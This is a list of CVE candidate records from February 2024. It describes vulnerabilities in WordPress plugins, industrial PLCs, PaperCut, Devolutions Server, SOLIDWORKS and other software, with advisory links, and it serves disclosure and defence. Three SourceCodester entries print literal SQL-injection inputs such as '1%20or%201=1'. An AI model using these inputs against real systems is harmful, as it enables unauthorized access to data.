CVE 2024 1918 Candidate A vulnerability has been found in Beijing Baichuo Smart S42 Management Platform up to 20240219 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /useratte/userattestation.php. The manipulation of the argument hidwel leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254839. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-254839 | Beijing Baichuo Smart S42 Management Platform userattestation.php unrestricted upload | URL:https://vuldb.com/?id.254839 | MISC:VDB-254839 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254839 | MISC:https://github.com/Echosssy/CVE/blob/main/%E5%85%B3%E4%BA%8ESmart%20S42%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%83%85%E5%86%B5%E9%80%9A%E6%8A%A5-userattestation.php.docx | URL:https://github.com/Echosssy/CVE/blob/main/%E5%85%B3%E4%BA%8ESmart%20S42%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E5%AD%98%E5%9C%A8%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%83%85%E5%86%B5%E9%80%9A%E6%8A%A5-userattestation.php.docx Assigned (20240227)
CVE 2024 1917 Candidate Integer Overflow or Wraparound vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet. MISC:https://jvn.jp/vu/JVNVU99690199/ | URL:https://jvn.jp/vu/JVNVU99690199/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14 | MISC:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf | URL:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf Assigned (20240227)
CVE 2024 1915 Candidate Incorrect Pointer Scaling vulnerability in Mitsubishi Electric Corporation MELSEC-Q Series and MELSEC-L Series CPU modules allows a remote unauthenticated attacker to execute malicious code on a target product by sending a specially crafted packet. MISC:https://jvn.jp/vu/JVNVU99690199/ | URL:https://jvn.jp/vu/JVNVU99690199/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-14 | MISC:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf | URL:https://www.mitsubishielectric.com/en/psirt/vulnerability/pdf/2023-024_en.pdf Assigned (20240227)
CVE 2024 1912 Candidate The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxUpdateFolderPosition function. This makes it possible for unauthenticated attackers to update the folder position of categories as well as update the metadata of other taxonomies via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca28c91-f75e-4691-91cf-459cc9da5ad8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ca28c91-f75e-4691-91cf-459cc9da5ad8?source=cve Assigned (20240226)
CVE 2024 1910 Candidate The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxClearCategory function. This makes it possible for unauthenticated attackers to clear categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b1c2712d-0865-4759-98da-1e11a26f2466?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b1c2712d-0865-4759-98da-1e11a26f2466?source=cve Assigned (20240226)
CVE 2024 1909 Candidate The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxRenameCategory function. This makes it possible for unauthenticated attackers to rename categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/58b29729-e9c3-4d57-affd-6142dfa8cc6f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/58b29729-e9c3-4d57-affd-6142dfa8cc6f?source=cve Assigned (20240226)
CVE 2024 1908 Candidate An Improper Privilege Management vulnerability was identified in GitHub Enterprise Server that allowed an attacker to use the Enterprise Actions GitHub Connect download token to fetch private repository data. An attacker would require an account on the server instance with non-default settings for GitHub Connect. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.16, 3.9.11, 3.10.8, and 3.11.6. This vulnerability was reported via the GitHub Bug Bounty program. MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes/#3.8.16 | URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes/#3.8.16 | MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes/#3.9.11 | URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes/#3.9.11 | MISC:https://https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.8 | URL:https://https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.8 | MISC:https://https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.16 | URL:https://https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.16 Assigned (20240226)
CVE 2024 1907 Candidate The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxDeleteCategory function. This makes it possible for unauthenticated attackers to delete categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/08c79118-9dad-44fd-b683-7950276d3808?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/08c79118-9dad-44fd-b683-7950276d3808?source=cve Assigned (20240226)
CVE 2024 1906 Candidate The Categorify plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.7.4. This is due to missing or incorrect nonce validation on the categorifyAjaxAddCategory function. This makes it possible for unauthenticated attackers to add categories via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3034410/categorify | URL:https://plugins.trac.wordpress.org/changeset/3034410/categorify | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78422a30-bdc6-4e7c-a018-c3dc4b4be6a0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78422a30-bdc6-4e7c-a018-c3dc4b4be6a0?source=cve Assigned (20240226)
CVE 2024 1901 Candidate Denial of service in PAM password rotation during the check-in process in Devolutions Server 2023.3.14.0 allows an authenticated user with specific PAM permissions to make PAM credentials unavailable. MISC:https://devolutions.net/security/advisories/DEVO-2024-0002 | URL:https://devolutions.net/security/advisories/DEVO-2024-0002 Assigned (20240226)
CVE 2024 1900 Candidate Improper session management in the identity provider authentication flow in Devolutions Server 2023.3.14.0 and earlier allows an authenticated user via an identity provider to stay authenticated after his user is disabled or deleted in the identity provider such as Okta or Microsoft O365. The user will stay authenticated until the Devolutions Server token expiration. MISC:https://devolutions.net/security/advisories/DEVO-2024-0002 | URL:https://devolutions.net/security/advisories/DEVO-2024-0002 Assigned (20240226)
CVE 2024 1899 Candidate An issue in the anchors subparser of Showdownjs versions <= 2.1.0 could allow a remote attacker to cause denial of service conditions. MISC:https://www.tenable.com/security/research/tra-2024-05 | URL:https://www.tenable.com/security/research/tra-2024-05 Assigned (20240226)
CVE 2024 1898 Candidate Improper access control in the notification feature in Devolutions Server 2023.3.14.0 and earlier allows a low privileged user to change notifications settings configured by an administrator. MISC:https://devolutions.net/security/advisories/DEVO-2024-0002 | URL:https://devolutions.net/security/advisories/DEVO-2024-0002 Assigned (20240226)
CVE 2024 1894 Candidate The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'burst_total_pageviews_count' custom meta field in all versions up to, and including, 1.5.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that this exploit only functions if the victim has the 'Show Toolbar when viewing site' option enabled in their profile. MISC:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/class-frontend.php#L67 | URL:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/class-frontend.php#L67 | MISC:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/class-frontend.php#L74 | URL:https://plugins.trac.wordpress.org/browser/burst-statistics/trunk/class-frontend.php#L74 | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/burst-statistics/tags/1.5.6.1&old=3049793&new_path=/burst-statistics/tags/1.5.7&new=3049793&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/burst-statistics/tags/1.5.6.1&old=3049793&new_path=/burst-statistics/tags/1.5.7&new=3049793&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/fa587df5-9d96-4cac-ae5d-2a0485a3a789?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/fa587df5-9d96-4cac-ae5d-2a0485a3a789?source=cve Assigned (20240226)
CVE 2024 1892 Candidate Parts of the Scrapy API were found to be vulnerable to a ReDoS attack. Handling a malicious response could cause extreme CPU and memory usage during the parsing of its content, due to the use of vulnerable regular expressions for that parsing. MISC:https://github.com/scrapy/scrapy/commit/479619b340f197a8f24c5db45bc068fb8755f2c5 | URL:https://github.com/scrapy/scrapy/commit/479619b340f197a8f24c5db45bc068fb8755f2c5 | MISC:https://huntr.com/bounties/271f94f2-1e05-4616-ac43-41752389e26b | URL:https://huntr.com/bounties/271f94f2-1e05-4616-ac43-41752389e26b Assigned (20240226)
CVE 2024 1890 Candidate Vulnerability whereby an attacker could send a malicious link to an authenticated operator, which could allow remote attackers to perform a clickjacking attack on Sunny WebBox firmware version 1.6.1 and earlier. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-sma-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-sma-products Assigned (20240226)
CVE 2024 1889 Candidate Cross-Site Request Forgery vulnerability in SMA Cluster Controller, affecting version 01.05.01.R. This vulnerability could allow an attacker to send a malicious link to an authenticated user to perform actions with these user permissions on the affected device. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-sma-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-sma-products Assigned (20240226)
CVE 2024 1888 Candidate Mattermost fails to check the "invite_guest" permission when inviting guests of other teams to a team, allowing a member with permissions to add other members but not to add guests to add a guest to a team as long as the guest was already a guest in another team of the server MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240226)
CVE 2024 1887 Candidate Mattermost fails to check if compliance export is enabled when fetching posts of public channels allowing a user that is not a member of the public channel to fetch the posts, which will not be audited in the compliance export. MISC:https://mattermost.com/security-updates | URL:https://mattermost.com/security-updates Assigned (20240226)
CVE 2024 1886 Candidate This vulnerability allows remote attackers to traverse the directory on the affected webOS of LG Signage. MISC:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails | URL:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails Assigned (20240226)
CVE 2024 1885 Candidate This vulnerability allows remote attackers to execute arbitrary code on the affected webOS of LG Signage. MISC:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails | URL:https://lgsecurity.lge.com/bulletins/idproducts#updateDetails Assigned (20240226)
CVE 2024 1884 Candidate This is a Server-Side Request Forgery (SSRF) vulnerability in the PaperCut NG/MF server-side module that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 | URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 Assigned (20240226)
CVE 2024 1883 Candidate This is a reflected cross site scripting vulnerability in the PaperCut NG/MF application server. An attacker can exploit this weakness by crafting a malicious URL that contains a script. When an unsuspecting user clicks on this malicious link, it could potentially lead to limited loss of confidentiality, integrity or availability. MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 | URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 Assigned (20240226)
CVE 2024 1882 Candidate This vulnerability allows an already authenticated admin user to create a malicious payload that could be leveraged for remote code execution on the server hosting the PaperCut NG/MF application server. MISC:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 | URL:https://www.papercut.com/kb/Main/Security-Bulletin-March-2024 Assigned (20240226)
CVE 2024 1878 Candidate A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /myprofile.php. The manipulation of the argument id with the input 1%20or%201=1 leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254726 is the identifier assigned to this vulnerability. MISC:VDB-254726 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254726 | MISC:VDB-254726 | SourceCodester Employee Management System myprofile.php sql injection | URL:https://vuldb.com/?id.254726 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/IDOR%20Employee%20Profile.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/IDOR%20Employee%20Profile.md Assigned (20240225)
CVE 2024 1877 Candidate A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /cancel.php. The manipulation of the argument id with the input 1%20or%201=1 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-254725 was assigned to this vulnerability. MISC:VDB-254725 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254725 | MISC:VDB-254725 | SourceCodester Employee Management System cancel.php sql injection | URL:https://vuldb.com/?id.254725 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/Employee%20Leave%20Cancel%20SQL%20Injection.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/Employee%20Leave%20Cancel%20SQL%20Injection.md Assigned (20240225)
CVE 2024 1876 Candidate A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file /psubmit.php. The manipulation of the argument pid with the input '+or+1%3d1%23 leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254724. MISC:VDB-254724 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254724 | MISC:VDB-254724 | SourceCodester Employee Management System psubmit.php sql injection | URL:https://vuldb.com/?id.254724 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/Employee%20Project%20SQL%20Injection%20Update.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/Employee%20Project%20SQL%20Injection%20Update.md Assigned (20240225)
CVE 2024 1875 Candidate A vulnerability was found in SourceCodester Complaint Management System 1.0 and classified as critical. This issue affects some unknown processing of the file users/register-complaint.php of the component Lodge Complaint Section. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254723. MISC:VDB-254723 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254723 | MISC:VDB-254723 | SourceCodester Complaint Management System Lodge Complaint Section register-complaint.php unrestricted upload | URL:https://vuldb.com/?id.254723 | MISC:https://toradah.notion.site/Remote-Code-Execution-RCE-via-Unrestricted-File-Upload-6ed7ae9c833c4d8baaae7d64ae0c4a47?pvs=4 | URL:https://toradah.notion.site/Remote-Code-Execution-RCE-via-Unrestricted-File-Upload-6ed7ae9c833c4d8baaae7d64ae0c4a47?pvs=4 Assigned (20240225)
CVE 2024 1871 Candidate A vulnerability, which was classified as problematic, was found in SourceCodester Employee Management System 1.0. Affected is an unknown function of the file /process/assignp.php of the component Project Assignment Report. The manipulation of the argument pname leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-254694 is the identifier assigned to this vulnerability. MISC:VDB-254694 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.254694 | MISC:VDB-254694 | SourceCodester Employee Management System Project Assignment Report assignp.php cross site scripting | URL:https://vuldb.com/?id.254694 | MISC:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/XSS%20Vulnerability%20in%20Project%20Assignment%20Report.md | URL:https://github.com/skid-nochizplz/skid-nochizplz/blob/main/TrashBin/CVE/SOURCECODESTER%20EMPLOYEE%20MANAGEMENT%20SYSTEM/XSS%20Vulnerability%20in%20Project%20Assignment%20Report.md Assigned (20240224)
CVE 2024 1870 Candidate The Colibri Page Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the callActivateLicenseEndpoint function in all versions up to, and including, 1.0.260. This makes it possible for authenticated attackers, with subscriber access or higher, to update the license key. MISC:https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/src/License/ActivationForm.php#L356 | URL:https://plugins.trac.wordpress.org/browser/colibri-page-builder/trunk/src/License/ActivationForm.php#L356 | MISC:https://plugins.trac.wordpress.org/changeset/3045582/colibri-page-builder/trunk/src/License/ActivationForm.php?contextall=1&old=2888093&old_path=%2Fcolibri-page-builder%2Ftrunk%2Fsrc%2FLicense%2FActivationForm.php | URL:https://plugins.trac.wordpress.org/changeset/3045582/colibri-page-builder/trunk/src/License/ActivationForm.php?contextall=1&old=2888093&old_path=%2Fcolibri-page-builder%2Ftrunk%2Fsrc%2FLicense%2FActivationForm.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/130637ce-d70a-4831-8b88-a2a6e8a95c42?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/130637ce-d70a-4831-8b88-a2a6e8a95c42?source=cve Assigned (20240223)
CVE 2024 1869 Candidate Certain HP DesignJet print products are potentially vulnerable to information disclosure related to accessing memory out-of-bounds when using the general-purpose gateway (GGW) over port 9220. MISC:https://support.hp.com/us-en/document/ish_10235960-10236033-16/hpsbpi03920 | URL:https://support.hp.com/us-en/document/ish_10235960-10236033-16/hpsbpi03920 Assigned (20240223)
CVE 2024 1866 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-2813. Reason: This candidate is a duplicate of CVE-2023-2813. Notes: All CVE users should reference CVE-2023-2813 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240223)
CVE 2024 1862 Candidate The WooCommerce Add to Cart Custom Redirect plugin for WordPress is vulnerable to unauthorized modification of data and loss of data due to a missing capability check on the 'wcr_dismiss_admin_notice' function in all versions up to, and including, 1.2.13. This makes it possible for authenticated attackers, with contributor access and above, to update the values of arbitrary site options to 'dismissed'. MISC:https://plugins.trac.wordpress.org/browser/woocommerce-add-to-cart-custom-redirect/tags/1.2.13/woocommerce-custom-redirect.php#L204 | URL:https://plugins.trac.wordpress.org/browser/woocommerce-add-to-cart-custom-redirect/tags/1.2.13/woocommerce-custom-redirect.php#L204 | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/woocommerce-add-to-cart-custom-redirect/tags/1.2.13&old=3047408&new_path=/woocommerce-add-to-cart-custom-redirect/tags/1.2.14&new=3047408&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/woocommerce-add-to-cart-custom-redirect/tags/1.2.13&old=3047408&new_path=/woocommerce-add-to-cart-custom-redirect/tags/1.2.14&new=3047408&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/36c6a116-37cc-4ade-b601-5f9d6aaf9217?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/36c6a116-37cc-4ade-b601-5f9d6aaf9217?source=cve Assigned (20240223)
CVE 2024 1861 Candidate The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_truncate_scan_table() function in all versions up to, and including, 4.52. This makes it possible for authenticated attackers, with subscriber-level access and above, to truncate the scan table. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040447%40antihacker&new=3040447%40antihacker&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040447%40antihacker&new=3040447%40antihacker&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b80c8888-e8d6-4458-ae93-8e4182060590?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b80c8888-e8d6-4458-ae93-8e4182060590?source=cve Assigned (20240223)
CVE 2024 1860 Candidate The Disable Json API, Login Lockdown, XMLRPC, Pingback, Stop User Enumeration Anti Hacker Scan plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the antihacker_add_whitelist() function in all versions up to, and including, 4.51. This makes it possible for unauthenticated attackers to add their IP Address to the whitelist circumventing protection MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040434%40antihacker&new=3040434%40antihacker&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040434%40antihacker&new=3040434%40antihacker&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d365284-73ac-4730-a83d-9202677cf161?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3d365284-73ac-4730-a83d-9202677cf161?source=cve Assigned (20240223)
CVE 2024 1859 Candidate The Slider Responsive Slideshow – Image slider, Gallery slideshow plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.3.8 via deserialization of untrusted input to the awl_slider_responsive_shortcode function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3041884%40slider-responsive-slideshow&new=3041884%40slider-responsive-slideshow&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3041884%40slider-responsive-slideshow&new=3041884%40slider-responsive-slideshow&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d35266cd-41e6-4358-afaa-bc008962f2e1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d35266cd-41e6-4358-afaa-bc008962f2e1?source=cve Assigned (20240223)
CVE 2024 1857 Candidate The Ultimate Gift Cards for WooCommerce – Create, Redeem & Manage Digital Gift Certificates with Personalized Templates plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the wps_wgm_preview_email_template(). This makes it possible for unauthenticated attackers to read password protected and draft posts that may contain sensitive data. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3046745%40woo-gift-cards-lite&new=3046745%40woo-gift-cards-lite&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3046745%40woo-gift-cards-lite&new=3046745%40woo-gift-cards-lite&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2b0d0c44-0ee8-400b-a4ea-e5520c2a6710?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2b0d0c44-0ee8-400b-a4ea-e5520c2a6710?source=cve Assigned (20240223)
CVE 2024 1856 Candidate In Progress® Telerik® Reporting versions prior to 2024 Q1 (18.0.24.130), a code execution attack is possible by a remote threat actor through an insecure deserialization vulnerability. MISC:https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-1801-cve-2024-1856 | URL:https://docs.telerik.com/reporting/knowledge-base/deserialization-vulnerability-cve-2024-1801-cve-2024-1856 | MISC:https://www.telerik.com/products/reporting.aspx | URL:https://www.telerik.com/products/reporting.aspx Assigned (20240223)
CVE 2024 1854 Candidate The Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the blockId parameter in all versions up to, and including, 4.5.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041859%40essential-blocks%2Ftrunk&old=3036273%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041859%40essential-blocks%2Ftrunk&old=3036273%40essential-blocks%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/86364b6f-dec8-48d8-9d2d-de1ee4901872?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/86364b6f-dec8-48d8-9d2d-de1ee4901872?source=cve Assigned (20240223)
CVE 2024 1853 Candidate Zemana AntiLogger v2.74.204.664 is vulnerable to an Arbitrary Process Termination vulnerability by triggering the 0x80002048 IOCTL code of the zam64.sys and zamguard64.sys drivers. MISC:https://fluidattacks.com/advisories/ellington/ | URL:https://fluidattacks.com/advisories/ellington/ | MISC:https://zemana.com/us/antilogger.html | URL:https://zemana.com/us/antilogger.html Assigned (20240223)
CVE 2024 1851 Candidate The affiliate-toolkit – WordPress Affiliate Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the atkp_create_list() function in all versions up to, and including, 3.5.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to to perform unauthorized actions such as creating product lists. MISC:https://plugins.trac.wordpress.org/changeset/3045821/affiliate-toolkit-starter/trunk/includes/atkp_endpoints.php | URL:https://plugins.trac.wordpress.org/changeset/3045821/affiliate-toolkit-starter/trunk/includes/atkp_endpoints.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e9e256b0-e4e3-4f41-842c-80aa2b80af72?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e9e256b0-e4e3-4f41-842c-80aa2b80af72?source=cve Assigned (20240223)
CVE 2024 1848 Candidate Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in SOLIDWORKS Desktop on Release SOLIDWORKS 2024. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, DWG, DXF, IPT, JT, SAT, SLDDRW, SLDPRT, STL, STP, X_B or X_T file. MISC:https://www.3ds.com/vulnerability/advisories | URL:https://www.3ds.com/vulnerability/advisories Assigned (20240223)
CVE 2024 1847 Candidate Heap-based Buffer Overflow, Memory Corruption, Out-Of-Bounds Read, Out-Of-Bounds Write, Stack-based Buffer Overflow, Type Confusion, Uninitialized Variable, Use-After-Free vulnerabilities exist in the file reading procedure in eDrawings from Release SOLIDWORKS 2023 through Release SOLIDWORKS 2024. These vulnerabilities could allow an attacker to execute arbitrary code while opening a specially crafted CATPART, DWG, DXF, IPT, JT, SAT, SLDDRW, SLDPRT, STL, STP, X_B or X_T file. MISC:https://www.3ds.com/vulnerability/advisories | URL:https://www.3ds.com/vulnerability/advisories Assigned (20240223)
